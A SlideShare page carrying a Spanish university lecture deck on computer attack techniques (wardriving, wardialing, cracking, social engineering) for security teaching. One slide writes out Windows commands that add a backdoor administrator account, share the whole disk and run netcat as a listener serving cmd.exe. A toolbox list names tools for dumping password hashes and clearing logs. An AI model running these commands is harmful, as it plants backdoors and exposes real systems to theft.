SlideShare uma empresa Scribd logo
1 de 17
Baixar para ler offline
TÉCNICAS DE ATAQUE EN
SEGURIDAD INFORMÁTICA
Grupo de I+D en Tecnologías de la
Información (GTI)
(Esp) Siler Amador Donado
samador@unicauca.edu.co
http://gseguridad.unicauca.edu.co
AGENDA
 Hackers vs Crackers
 El riesgo en la seguridad informática
 Pérdidas económicas por ataques informáticos
 Técnicas de ataque
 Vectores de ataque a una red
 Y si tienen la oportunidad…
 Caja de herramientas de ataque
 La próxima generación de Troyanos Keylogers
 Demo (Ataque Masivo)
 … Y en la Unicauca que?
 Conclusiones
HACKERS VS CRACKERS
Hackers Crackers
EL RIESGO EN LA SEGURIDAD
INFORMÁTICA
PÉRDIDAS POR ATAQUES
CCS/FBI
PÉRDIDAS POR ATAQUES
CCS/FBI
$67.2 billones por año
$7.6 millones por hora
TECNICAS DE ATAQUE
Wardriving: Nombre que recibe la búsqueda de redes
inalámbricas para documentar su posición. Para realizar esta
búsqueda se necesita como mínimo un equipo móvil (portátil) con
tarjeta Wireless, y si queremos que la posición sea precisa, un GPS
para pasar los datos a un mapa.
Objetivo: Conectarse al punto de acceso (AP) mal configurado e
ingresar a la la red local de la empresa.
Herramientas:
 NetStumbler
 Kismet
 http://www.wardrive.net/wardriving/tools
TECNICAS DE ATAQUE
Wardialing: Fue una técnica de los 80´s y 90´s, consitía en
marcar repetidamente a modems y PBX´s disponibles en la red y de
esta forma irrumpir a sistemas remotos.
Objetivo: Conectarse a modems o PBX´s mal configurados e
ingresar a la la red local de la empresa.
Herramientas:
 THC-Scan 2.0
 ModemScan
 ShokDial
TECNICAS DE ATAQUE
Cracking: Modificar un programa para obtener beneficios.
Normalmente se basa en quitar pantallas introductorias,
protecciones o, como en unas modificaciones de cierto programa de
comunicaciones, conseguir nuevos passwords de acceso a
sistemas.
Objetivo:
Tener acceso al software o a la red interna.
Herramientas:
 Las 100 mejores http://sectools.org/
 Inyección SQL
 XSS
TECNICAS DE ATAQUE
Ing. Social: Persuadir a otra persona (a través de diversas
formas) para que nos de un dato útil para cumplir un objetivo. Este
dato puede ser un password, un código, etc. incluso pueden dar
nombres de familiares y fechas importantes, que siempre se usan
para formar claves.
Objetivo: Obtener información sensible que nos permita el
acceso a la red.
Herramientas:
 Teléfono
 Mucha psicología
 Inteligencia emocional
 http://www.laflecha.net/perfiles/tecnologia/kevin_mitnick/
VECTORES DE ATAQUE A UNA RED
Puntos de acceso
INTERNET
MODEM
WIRELESS
FISICO
RED
Wardriving
Ing. Social
Wardialing
Cracking
Y si tienen la oportunidad…
 Menos de 1 minuto es suficiente para:
1. Crear una cuenta con privilegios de Admin!!!
1. Abrir la consola de comandos
2. C:net user fusm2010 fusm2010 /add
3. C:net localgroup administradores fusm2010 /add
2. Compartir toda la unidad del disco!!!
1. C:net share fusm2010=c: /remark:”Demo fusm2010”
3. Colocar un programa en escucha!!!
1. http://gseguridad.unicauca.edu.co/nc.exe
2. C:WINNTSystem32nc.exe -d -L -p 55555 -e cmd.exe
Caja de Herramientas de ataque en
línea de comandos
fport.exe - shows open ports and the process that owns the port
iplist.exe - enumerates the ip's of the computer
md5.exe - gets the md5 hash of a file
pw2kget.exe - for win2k gets the password of the currently logged on user
pwreveal.exe - gets the passwords of any window that has a ****** editbox
regshell.exe - a commandline registry explorer/editor
sendmail.exe - a commandline email sender
uptime.exe - gets the machines current uptime
xwhois - advanced whois lookup
Screencap.exe - makes a screenshot of the screen and saves it to screenshot.bmp
CMDget.exe - Downloads a file from a website from user provided parameters
webscr.exe - creates a snapshot from the webcam and saves it
shutd.exe - program that forces shutdown/reboot of machine
bnc.exe - bnc for windows (see bnc.cfg)
clslog.exe - clears app/security/system logs XP/NT/2k
enum.exe - enumerates IPC$ share to collect information
winfo.exe - enumerates IPC$ share to collect information
FTPd.exe - small ftp server for dos (see slimftpd.conf)
Global.exe - process dos command on all disc/subdirs
iislog.exe - clears IIS logs
Info.exe - gets system information
ispc.exe - spawns shell on hacked IIS (put idq.dll on remote script dir)
nc.exe - netcat
pv.exe - process manager for dos
Pwdump.exe - dumps SAM hashes
scrnmode.exe - change screen mode from dos
unrar.exe - unrar for dos
wget.exe - wget for windows
wizmo.exe - command tool (see w.txt)
dwpp.exe - dial up password graber
winrelay.exe - relay tcp/udp connections
getad.exe - escalate to admin user in w2k
pipeup.exe - escalate to admin user in w2k
dnsid - identify remore dns server
Agradecimientos a: Netranger
Tomado de: http://www.governmentsecurity.org/forum/lofiversion/index.php/t2824.html
LA PRÓXIMA GENERACION DE
TROYANOS KEYLOGERS…
http://www.hispasec.com/laboratorio/troyano_video.htm
VIDEO
EJEMPLO DE ATAQUE MASIVO
 Escenario
INTERNET LAN
ATACANTE MAESTRO
ZOMBIES
Linux/Windows
Metasploit
Scripts en Python
Linux-BackTrack4
Win/XP/2K
http://www.microsoft.com/spain/technet/seguridad/boletines/ms05-039-it.mspx
... Y en la Unicauca que?
• Electiva de seguridad informática
• Área de interés en seguridad informática del GTI. (Proyectos de tesis
de grado)
• Legislación en comercio electrónico (Finalizado)
• OBSES (Firewall Cluster Beowulf) (Finalizado)
• INFORCE (Finalizado)
• Antivirus-inteligente (En desarrollo)
• Estudio de las tendencias predictivas sobre la escogencia de
contraseñas basado en redes bayesianas (Finalizado)
• Proyecto SGSI en UNICAUCA (En desarrollo)
• Publicaciones
Preocupación del departamento de sistemas de la FIET sobre la
problemática de la seguridad de la información en Colombia.
CONCLUSIONES
 Los ataques de seguridad informática a nivel mundial son
aislados? Inversión en guerra informática? ECHELON,
ENFOPOL, CARNÍVORO…
• USA
• UK
• CHINA
• RUSIA
 Los sistemas de seguridad actuales son reactivos y correctivos.
• Preventivos
• Inteligentes
 Existen demasiadas herramientas de ataque gratis y
disponibles en la red.
 Las técnicas de ataque cambian constantemente.
 Segun las estadísticas es muy probable que su sistema
haya sido vulnerado y usted aún no lo sepa!!!.

Mais conteúdo relacionado

Mais procurados

David Barroso - iPhone + Botnets = FUN! [RootedCON 2010]
David Barroso - iPhone + Botnets = FUN! [RootedCON 2010]David Barroso - iPhone + Botnets = FUN! [RootedCON 2010]
David Barroso - iPhone + Botnets = FUN! [RootedCON 2010]RootedCON
 
Android forensics
Android forensicsAndroid forensics
Android forensicslimahack
 
Como convertirse en hacker
Como convertirse en hackerComo convertirse en hacker
Como convertirse en hackerhackbo
 
Obtener contraseñas del directorio activo por hkm
Obtener contraseñas del directorio activo por hkmObtener contraseñas del directorio activo por hkm
Obtener contraseñas del directorio activo por hkmWebsec México, S.C.
 
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...RootedCON
 
All your appliances are belong to us
All your appliances are belong to usAll your appliances are belong to us
All your appliances are belong to usnavajanegra
 
Internet de las cosas
Internet de las cosasInternet de las cosas
Internet de las cosastico2llorente
 
Internet de las cosas
Internet de las cosasInternet de las cosas
Internet de las cosastico2llorente
 
Acta de entrega de equipos 2
Acta de entrega de equipos 2Acta de entrega de equipos 2
Acta de entrega de equipos 2PAGM626
 
Libro de Seguridad en Redes
Libro de Seguridad en RedesLibro de Seguridad en Redes
Libro de Seguridad en RedesTelefónica
 
Acta de entrega de equipos 1
Acta de entrega de equipos 1Acta de entrega de equipos 1
Acta de entrega de equipos 1PAGM626
 
Seguridad inalámbrica
Seguridad inalámbricaSeguridad inalámbrica
Seguridad inalámbricatena10
 
Ataques Y Vulnerabilidades
Ataques Y VulnerabilidadesAtaques Y Vulnerabilidades
Ataques Y Vulnerabilidadeslamugre
 

Mais procurados (16)

Rg4l
Rg4lRg4l
Rg4l
 
David Barroso - iPhone + Botnets = FUN! [RootedCON 2010]
David Barroso - iPhone + Botnets = FUN! [RootedCON 2010]David Barroso - iPhone + Botnets = FUN! [RootedCON 2010]
David Barroso - iPhone + Botnets = FUN! [RootedCON 2010]
 
Android forensics
Android forensicsAndroid forensics
Android forensics
 
La biblia del hacker
La biblia del hackerLa biblia del hacker
La biblia del hacker
 
Como convertirse en hacker
Como convertirse en hackerComo convertirse en hacker
Como convertirse en hacker
 
Obtener contraseñas del directorio activo por hkm
Obtener contraseñas del directorio activo por hkmObtener contraseñas del directorio activo por hkm
Obtener contraseñas del directorio activo por hkm
 
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
 
All your appliances are belong to us
All your appliances are belong to usAll your appliances are belong to us
All your appliances are belong to us
 
Internet de las cosas
Internet de las cosasInternet de las cosas
Internet de las cosas
 
Internet de las cosas
Internet de las cosasInternet de las cosas
Internet de las cosas
 
Acta de entrega de equipos 2
Acta de entrega de equipos 2Acta de entrega de equipos 2
Acta de entrega de equipos 2
 
Libro de Seguridad en Redes
Libro de Seguridad en RedesLibro de Seguridad en Redes
Libro de Seguridad en Redes
 
Acta de entrega de equipos 1
Acta de entrega de equipos 1Acta de entrega de equipos 1
Acta de entrega de equipos 1
 
Seguridad inalámbrica
Seguridad inalámbricaSeguridad inalámbrica
Seguridad inalámbrica
 
LOS VIRUS INFORMATICOS
LOS VIRUS INFORMATICOSLOS VIRUS INFORMATICOS
LOS VIRUS INFORMATICOS
 
Ataques Y Vulnerabilidades
Ataques Y VulnerabilidadesAtaques Y Vulnerabilidades
Ataques Y Vulnerabilidades
 

Semelhante a Seguridad Informática

Pablo Gonzalez & Fran Ramirez - Hidden Networks: Controlas todas las redes de...
Pablo Gonzalez & Fran Ramirez - Hidden Networks: Controlas todas las redes de...Pablo Gonzalez & Fran Ramirez - Hidden Networks: Controlas todas las redes de...
Pablo Gonzalez & Fran Ramirez - Hidden Networks: Controlas todas las redes de...RootedCON
 
Análisis Forense Memoria RAM
Análisis Forense Memoria RAMAnálisis Forense Memoria RAM
Análisis Forense Memoria RAMConferencias FIST
 
Tema 2 Redes Michael
Tema 2 Redes MichaelTema 2 Redes Michael
Tema 2 Redes Michaelmicahel
 
Forense android
Forense androidForense android
Forense androidRafael Seg
 
Actividades informatica 2ª Evaluacion
Actividades informatica 2ª EvaluacionActividades informatica 2ª Evaluacion
Actividades informatica 2ª EvaluacionALBAREBAQUE
 
Sistemas de seguridad trabajo
Sistemas de seguridad   trabajoSistemas de seguridad   trabajo
Sistemas de seguridad trabajoKiim Kerrigan
 
Un caso Forense: La Red y la Memoria RAM
Un caso Forense: La Red y la Memoria RAMUn caso Forense: La Red y la Memoria RAM
Un caso Forense: La Red y la Memoria RAMEventos Creativos
 
PeruHack 2014 - Post Explotacion en Entornos Windows
PeruHack 2014 - Post Explotacion en Entornos WindowsPeruHack 2014 - Post Explotacion en Entornos Windows
PeruHack 2014 - Post Explotacion en Entornos WindowsMauricio Velazco
 
When mobile phone (not) meets privacy More than apps & OS
When mobile phone (not) meets privacy  More than apps & OSWhen mobile phone (not) meets privacy  More than apps & OS
When mobile phone (not) meets privacy More than apps & OSAlfonso Muñoz, PhD
 
Resolución de concursos de la NoConName 2010 v1.0
Resolución de concursos de la NoConName 2010 v1.0Resolución de concursos de la NoConName 2010 v1.0
Resolución de concursos de la NoConName 2010 v1.0Alejandro Ramos
 
Tema 2 Judith & Sheila
Tema 2  Judith &  SheilaTema 2  Judith &  Sheila
Tema 2 Judith & Sheilasheilagal12
 
Glosario informatica
Glosario informaticaGlosario informatica
Glosario informaticaedwin alvarez
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticawalteraguero
 
Servicios en red
Servicios en redServicios en red
Servicios en redprades17
 

Semelhante a Seguridad Informática (20)

Estrategias de Ataque y Defensa
Estrategias de Ataque y DefensaEstrategias de Ataque y Defensa
Estrategias de Ataque y Defensa
 
Pablo Gonzalez & Fran Ramirez - Hidden Networks: Controlas todas las redes de...
Pablo Gonzalez & Fran Ramirez - Hidden Networks: Controlas todas las redes de...Pablo Gonzalez & Fran Ramirez - Hidden Networks: Controlas todas las redes de...
Pablo Gonzalez & Fran Ramirez - Hidden Networks: Controlas todas las redes de...
 
Análisis Forense Memoria RAM
Análisis Forense Memoria RAMAnálisis Forense Memoria RAM
Análisis Forense Memoria RAM
 
Tema 2 Redes Michael
Tema 2 Redes MichaelTema 2 Redes Michael
Tema 2 Redes Michael
 
Investigacion seguridad 2
Investigacion seguridad 2Investigacion seguridad 2
Investigacion seguridad 2
 
Antivirus y definiciones
Antivirus y definicionesAntivirus y definiciones
Antivirus y definiciones
 
Seguridad anti hacking
Seguridad anti hacking  Seguridad anti hacking
Seguridad anti hacking
 
Segunda evaluación
Segunda  evaluaciónSegunda  evaluación
Segunda evaluación
 
Forense android
Forense androidForense android
Forense android
 
Actividades informatica 2ª Evaluacion
Actividades informatica 2ª EvaluacionActividades informatica 2ª Evaluacion
Actividades informatica 2ª Evaluacion
 
Sistemas de seguridad trabajo
Sistemas de seguridad   trabajoSistemas de seguridad   trabajo
Sistemas de seguridad trabajo
 
S.oper 180604.pps[1]
S.oper 180604.pps[1]S.oper 180604.pps[1]
S.oper 180604.pps[1]
 
Un caso Forense: La Red y la Memoria RAM
Un caso Forense: La Red y la Memoria RAMUn caso Forense: La Red y la Memoria RAM
Un caso Forense: La Red y la Memoria RAM
 
PeruHack 2014 - Post Explotacion en Entornos Windows
PeruHack 2014 - Post Explotacion en Entornos WindowsPeruHack 2014 - Post Explotacion en Entornos Windows
PeruHack 2014 - Post Explotacion en Entornos Windows
 
When mobile phone (not) meets privacy More than apps & OS
When mobile phone (not) meets privacy  More than apps & OSWhen mobile phone (not) meets privacy  More than apps & OS
When mobile phone (not) meets privacy More than apps & OS
 
Resolución de concursos de la NoConName 2010 v1.0
Resolución de concursos de la NoConName 2010 v1.0Resolución de concursos de la NoConName 2010 v1.0
Resolución de concursos de la NoConName 2010 v1.0
 
Tema 2 Judith & Sheila
Tema 2  Judith &  SheilaTema 2  Judith &  Sheila
Tema 2 Judith & Sheila
 
Glosario informatica
Glosario informaticaGlosario informatica
Glosario informatica
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Servicios en red
Servicios en redServicios en red
Servicios en red
 

Mais de Tm-CS

Notas curso Telemática 1 2014
Notas curso Telemática 1 2014Notas curso Telemática 1 2014
Notas curso Telemática 1 2014Tm-CS
 
Telemática en el proyecto Joiner
Telemática en el proyecto JoinerTelemática en el proyecto Joiner
Telemática en el proyecto JoinerTm-CS
 
Conferencias del 26 al 29 de mayo
Conferencias del 26 al 29 de mayoConferencias del 26 al 29 de mayo
Conferencias del 26 al 29 de mayoTm-CS
 
Television digital interactiva
Television digital interactivaTelevision digital interactiva
Television digital interactivaTm-CS
 
Conferencias 12 al 15 de mayo
Conferencias 12 al 15 de mayoConferencias 12 al 15 de mayo
Conferencias 12 al 15 de mayoTm-CS
 
Conferencias 12 de mayo
Conferencias 12 de mayoConferencias 12 de mayo
Conferencias 12 de mayoTm-CS
 
Educacion en linea
Educacion en lineaEducacion en linea
Educacion en lineaTm-CS
 
Software Libre
Software LibreSoftware Libre
Software LibreTm-CS
 
Conferencias 5 al 9 de mayo
Conferencias 5 al 9 de mayoConferencias 5 al 9 de mayo
Conferencias 5 al 9 de mayoTm-CS
 
Software Libre 2014
Software Libre 2014Software Libre 2014
Software Libre 2014Tm-CS
 
Conferencias 28 de abril curso Telematica
Conferencias 28 de abril curso TelematicaConferencias 28 de abril curso Telematica
Conferencias 28 de abril curso TelematicaTm-CS
 
Servicios móviles
Servicios móvilesServicios móviles
Servicios móvilesTm-CS
 
Consejos seguridad INTECO
Consejos seguridad INTECOConsejos seguridad INTECO
Consejos seguridad INTECOTm-CS
 
Hci curso comsocial-2014
Hci curso comsocial-2014Hci curso comsocial-2014
Hci curso comsocial-2014Tm-CS
 
Conferencias 24 de abril curso telematica
Conferencias 24 de abril curso telematicaConferencias 24 de abril curso telematica
Conferencias 24 de abril curso telematicaTm-CS
 
Web 2.0
Web 2.0Web 2.0
Web 2.0Tm-CS
 
Instrucciones protocolos curso Telemática
Instrucciones protocolos curso TelemáticaInstrucciones protocolos curso Telemática
Instrucciones protocolos curso TelemáticaTm-CS
 
Programación 01 conferencias curso de Telemática
Programación 01 conferencias curso de TelemáticaProgramación 01 conferencias curso de Telemática
Programación 01 conferencias curso de TelemáticaTm-CS
 
Telecomunicaciones en Colombia
Telecomunicaciones en ColombiaTelecomunicaciones en Colombia
Telecomunicaciones en ColombiaTm-CS
 
Taller preparatorio examen de primer parcial
Taller preparatorio examen de primer parcial Taller preparatorio examen de primer parcial
Taller preparatorio examen de primer parcial Tm-CS
 

Mais de Tm-CS (20)

Notas curso Telemática 1 2014
Notas curso Telemática 1 2014Notas curso Telemática 1 2014
Notas curso Telemática 1 2014
 
Telemática en el proyecto Joiner
Telemática en el proyecto JoinerTelemática en el proyecto Joiner
Telemática en el proyecto Joiner
 
Conferencias del 26 al 29 de mayo
Conferencias del 26 al 29 de mayoConferencias del 26 al 29 de mayo
Conferencias del 26 al 29 de mayo
 
Television digital interactiva
Television digital interactivaTelevision digital interactiva
Television digital interactiva
 
Conferencias 12 al 15 de mayo
Conferencias 12 al 15 de mayoConferencias 12 al 15 de mayo
Conferencias 12 al 15 de mayo
 
Conferencias 12 de mayo
Conferencias 12 de mayoConferencias 12 de mayo
Conferencias 12 de mayo
 
Educacion en linea
Educacion en lineaEducacion en linea
Educacion en linea
 
Software Libre
Software LibreSoftware Libre
Software Libre
 
Conferencias 5 al 9 de mayo
Conferencias 5 al 9 de mayoConferencias 5 al 9 de mayo
Conferencias 5 al 9 de mayo
 
Software Libre 2014
Software Libre 2014Software Libre 2014
Software Libre 2014
 
Conferencias 28 de abril curso Telematica
Conferencias 28 de abril curso TelematicaConferencias 28 de abril curso Telematica
Conferencias 28 de abril curso Telematica
 
Servicios móviles
Servicios móvilesServicios móviles
Servicios móviles
 
Consejos seguridad INTECO
Consejos seguridad INTECOConsejos seguridad INTECO
Consejos seguridad INTECO
 
Hci curso comsocial-2014
Hci curso comsocial-2014Hci curso comsocial-2014
Hci curso comsocial-2014
 
Conferencias 24 de abril curso telematica
Conferencias 24 de abril curso telematicaConferencias 24 de abril curso telematica
Conferencias 24 de abril curso telematica
 
Web 2.0
Web 2.0Web 2.0
Web 2.0
 
Instrucciones protocolos curso Telemática
Instrucciones protocolos curso TelemáticaInstrucciones protocolos curso Telemática
Instrucciones protocolos curso Telemática
 
Programación 01 conferencias curso de Telemática
Programación 01 conferencias curso de TelemáticaProgramación 01 conferencias curso de Telemática
Programación 01 conferencias curso de Telemática
 
Telecomunicaciones en Colombia
Telecomunicaciones en ColombiaTelecomunicaciones en Colombia
Telecomunicaciones en Colombia
 
Taller preparatorio examen de primer parcial
Taller preparatorio examen de primer parcial Taller preparatorio examen de primer parcial
Taller preparatorio examen de primer parcial
 

Último

Curso = Metodos Tecnicas y Modelos de Enseñanza.pdf
Curso = Metodos Tecnicas y Modelos de Enseñanza.pdfCurso = Metodos Tecnicas y Modelos de Enseñanza.pdf
Curso = Metodos Tecnicas y Modelos de Enseñanza.pdfFrancisco158360
 
INSTRUCCION PREPARATORIA DE TIRO .pptx
INSTRUCCION PREPARATORIA DE TIRO   .pptxINSTRUCCION PREPARATORIA DE TIRO   .pptx
INSTRUCCION PREPARATORIA DE TIRO .pptxdeimerhdz21
 
PIAR v 015. 2024 Plan Individual de ajustes razonables
PIAR v 015. 2024 Plan Individual de ajustes razonablesPIAR v 015. 2024 Plan Individual de ajustes razonables
PIAR v 015. 2024 Plan Individual de ajustes razonablesYanirisBarcelDelaHoz
 
ACERTIJO DE LA BANDERA OLÍMPICA CON ECUACIONES DE LA CIRCUNFERENCIA. Por JAVI...
ACERTIJO DE LA BANDERA OLÍMPICA CON ECUACIONES DE LA CIRCUNFERENCIA. Por JAVI...ACERTIJO DE LA BANDERA OLÍMPICA CON ECUACIONES DE LA CIRCUNFERENCIA. Por JAVI...
ACERTIJO DE LA BANDERA OLÍMPICA CON ECUACIONES DE LA CIRCUNFERENCIA. Por JAVI...JAVIER SOLIS NOYOLA
 
Sesión de aprendizaje Planifica Textos argumentativo.docx
Sesión de aprendizaje Planifica Textos argumentativo.docxSesión de aprendizaje Planifica Textos argumentativo.docx
Sesión de aprendizaje Planifica Textos argumentativo.docxMaritzaRetamozoVera
 
Dinámica florecillas a María en el mes d
Dinámica florecillas a María en el mes dDinámica florecillas a María en el mes d
Dinámica florecillas a María en el mes dstEphaniiie
 
Registro Auxiliar - Primaria 2024 (1).pptx
Registro Auxiliar - Primaria  2024 (1).pptxRegistro Auxiliar - Primaria  2024 (1).pptx
Registro Auxiliar - Primaria 2024 (1).pptxFelicitasAsuncionDia
 
AFICHE EL MANIERISMO HISTORIA DE LA ARQUITECTURA II
AFICHE EL MANIERISMO HISTORIA DE LA ARQUITECTURA IIAFICHE EL MANIERISMO HISTORIA DE LA ARQUITECTURA II
AFICHE EL MANIERISMO HISTORIA DE LA ARQUITECTURA IIIsauraImbrondone
 
Ley 21.545 - Circular Nº 586.pdf circular
Ley 21.545 - Circular Nº 586.pdf circularLey 21.545 - Circular Nº 586.pdf circular
Ley 21.545 - Circular Nº 586.pdf circularMooPandrea
 
Programacion Anual Matemática5 MPG 2024 Ccesa007.pdf
Programacion Anual Matemática5    MPG 2024  Ccesa007.pdfProgramacion Anual Matemática5    MPG 2024  Ccesa007.pdf
Programacion Anual Matemática5 MPG 2024 Ccesa007.pdfDemetrio Ccesa Rayme
 
Criterios ESG: fundamentos, aplicaciones y beneficios
Criterios ESG: fundamentos, aplicaciones y beneficiosCriterios ESG: fundamentos, aplicaciones y beneficios
Criterios ESG: fundamentos, aplicaciones y beneficiosJonathanCovena1
 
MAYO 1 PROYECTO día de la madre el amor más grande
MAYO 1 PROYECTO día de la madre el amor más grandeMAYO 1 PROYECTO día de la madre el amor más grande
MAYO 1 PROYECTO día de la madre el amor más grandeMarjorie Burga
 
plande accion dl aula de innovación pedagogica 2024.pdf
plande accion dl aula de innovación pedagogica 2024.pdfplande accion dl aula de innovación pedagogica 2024.pdf
plande accion dl aula de innovación pedagogica 2024.pdfenelcielosiempre
 
TIPOLOGÍA TEXTUAL- EXPOSICIÓN Y ARGUMENTACIÓN.pptx
TIPOLOGÍA TEXTUAL- EXPOSICIÓN Y ARGUMENTACIÓN.pptxTIPOLOGÍA TEXTUAL- EXPOSICIÓN Y ARGUMENTACIÓN.pptx
TIPOLOGÍA TEXTUAL- EXPOSICIÓN Y ARGUMENTACIÓN.pptxlclcarmen
 
PLAN DE REFUERZO ESCOLAR primaria (1).docx
PLAN DE REFUERZO ESCOLAR primaria (1).docxPLAN DE REFUERZO ESCOLAR primaria (1).docx
PLAN DE REFUERZO ESCOLAR primaria (1).docxlupitavic
 
Programacion Anual Matemática4 MPG 2024 Ccesa007.pdf
Programacion Anual Matemática4    MPG 2024  Ccesa007.pdfProgramacion Anual Matemática4    MPG 2024  Ccesa007.pdf
Programacion Anual Matemática4 MPG 2024 Ccesa007.pdfDemetrio Ccesa Rayme
 
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLA
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLAACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLA
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLAJAVIER SOLIS NOYOLA
 

Último (20)

Curso = Metodos Tecnicas y Modelos de Enseñanza.pdf
Curso = Metodos Tecnicas y Modelos de Enseñanza.pdfCurso = Metodos Tecnicas y Modelos de Enseñanza.pdf
Curso = Metodos Tecnicas y Modelos de Enseñanza.pdf
 
INSTRUCCION PREPARATORIA DE TIRO .pptx
INSTRUCCION PREPARATORIA DE TIRO   .pptxINSTRUCCION PREPARATORIA DE TIRO   .pptx
INSTRUCCION PREPARATORIA DE TIRO .pptx
 
PIAR v 015. 2024 Plan Individual de ajustes razonables
PIAR v 015. 2024 Plan Individual de ajustes razonablesPIAR v 015. 2024 Plan Individual de ajustes razonables
PIAR v 015. 2024 Plan Individual de ajustes razonables
 
ACERTIJO DE LA BANDERA OLÍMPICA CON ECUACIONES DE LA CIRCUNFERENCIA. Por JAVI...
ACERTIJO DE LA BANDERA OLÍMPICA CON ECUACIONES DE LA CIRCUNFERENCIA. Por JAVI...ACERTIJO DE LA BANDERA OLÍMPICA CON ECUACIONES DE LA CIRCUNFERENCIA. Por JAVI...
ACERTIJO DE LA BANDERA OLÍMPICA CON ECUACIONES DE LA CIRCUNFERENCIA. Por JAVI...
 
Fe contra todo pronóstico. La fe es confianza.
Fe contra todo pronóstico. La fe es confianza.Fe contra todo pronóstico. La fe es confianza.
Fe contra todo pronóstico. La fe es confianza.
 
Sesión de aprendizaje Planifica Textos argumentativo.docx
Sesión de aprendizaje Planifica Textos argumentativo.docxSesión de aprendizaje Planifica Textos argumentativo.docx
Sesión de aprendizaje Planifica Textos argumentativo.docx
 
Dinámica florecillas a María en el mes d
Dinámica florecillas a María en el mes dDinámica florecillas a María en el mes d
Dinámica florecillas a María en el mes d
 
Registro Auxiliar - Primaria 2024 (1).pptx
Registro Auxiliar - Primaria  2024 (1).pptxRegistro Auxiliar - Primaria  2024 (1).pptx
Registro Auxiliar - Primaria 2024 (1).pptx
 
AFICHE EL MANIERISMO HISTORIA DE LA ARQUITECTURA II
AFICHE EL MANIERISMO HISTORIA DE LA ARQUITECTURA IIAFICHE EL MANIERISMO HISTORIA DE LA ARQUITECTURA II
AFICHE EL MANIERISMO HISTORIA DE LA ARQUITECTURA II
 
Ley 21.545 - Circular Nº 586.pdf circular
Ley 21.545 - Circular Nº 586.pdf circularLey 21.545 - Circular Nº 586.pdf circular
Ley 21.545 - Circular Nº 586.pdf circular
 
Programacion Anual Matemática5 MPG 2024 Ccesa007.pdf
Programacion Anual Matemática5    MPG 2024  Ccesa007.pdfProgramacion Anual Matemática5    MPG 2024  Ccesa007.pdf
Programacion Anual Matemática5 MPG 2024 Ccesa007.pdf
 
Criterios ESG: fundamentos, aplicaciones y beneficios
Criterios ESG: fundamentos, aplicaciones y beneficiosCriterios ESG: fundamentos, aplicaciones y beneficios
Criterios ESG: fundamentos, aplicaciones y beneficios
 
MAYO 1 PROYECTO día de la madre el amor más grande
MAYO 1 PROYECTO día de la madre el amor más grandeMAYO 1 PROYECTO día de la madre el amor más grande
MAYO 1 PROYECTO día de la madre el amor más grande
 
Unidad 3 | Metodología de la Investigación
Unidad 3 | Metodología de la InvestigaciónUnidad 3 | Metodología de la Investigación
Unidad 3 | Metodología de la Investigación
 
plande accion dl aula de innovación pedagogica 2024.pdf
plande accion dl aula de innovación pedagogica 2024.pdfplande accion dl aula de innovación pedagogica 2024.pdf
plande accion dl aula de innovación pedagogica 2024.pdf
 
TIPOLOGÍA TEXTUAL- EXPOSICIÓN Y ARGUMENTACIÓN.pptx
TIPOLOGÍA TEXTUAL- EXPOSICIÓN Y ARGUMENTACIÓN.pptxTIPOLOGÍA TEXTUAL- EXPOSICIÓN Y ARGUMENTACIÓN.pptx
TIPOLOGÍA TEXTUAL- EXPOSICIÓN Y ARGUMENTACIÓN.pptx
 
PLAN DE REFUERZO ESCOLAR primaria (1).docx
PLAN DE REFUERZO ESCOLAR primaria (1).docxPLAN DE REFUERZO ESCOLAR primaria (1).docx
PLAN DE REFUERZO ESCOLAR primaria (1).docx
 
Programacion Anual Matemática4 MPG 2024 Ccesa007.pdf
Programacion Anual Matemática4    MPG 2024  Ccesa007.pdfProgramacion Anual Matemática4    MPG 2024  Ccesa007.pdf
Programacion Anual Matemática4 MPG 2024 Ccesa007.pdf
 
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLA
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLAACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLA
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLA
 
Sesión de clase: Fe contra todo pronóstico
Sesión de clase: Fe contra todo pronósticoSesión de clase: Fe contra todo pronóstico
Sesión de clase: Fe contra todo pronóstico
 

Seguridad Informática

  • 1. TÉCNICAS DE ATAQUE EN SEGURIDAD INFORMÁTICA Grupo de I+D en Tecnologías de la Información (GTI) (Esp) Siler Amador Donado samador@unicauca.edu.co http://gseguridad.unicauca.edu.co
  • 2. AGENDA  Hackers vs Crackers  El riesgo en la seguridad informática  Pérdidas económicas por ataques informáticos  Técnicas de ataque  Vectores de ataque a una red  Y si tienen la oportunidad…  Caja de herramientas de ataque  La próxima generación de Troyanos Keylogers  Demo (Ataque Masivo)  … Y en la Unicauca que?  Conclusiones
  • 4. EL RIESGO EN LA SEGURIDAD INFORMÁTICA
  • 6. PÉRDIDAS POR ATAQUES CCS/FBI $67.2 billones por año $7.6 millones por hora
  • 7. TECNICAS DE ATAQUE Wardriving: Nombre que recibe la búsqueda de redes inalámbricas para documentar su posición. Para realizar esta búsqueda se necesita como mínimo un equipo móvil (portátil) con tarjeta Wireless, y si queremos que la posición sea precisa, un GPS para pasar los datos a un mapa. Objetivo: Conectarse al punto de acceso (AP) mal configurado e ingresar a la la red local de la empresa. Herramientas:  NetStumbler  Kismet  http://www.wardrive.net/wardriving/tools
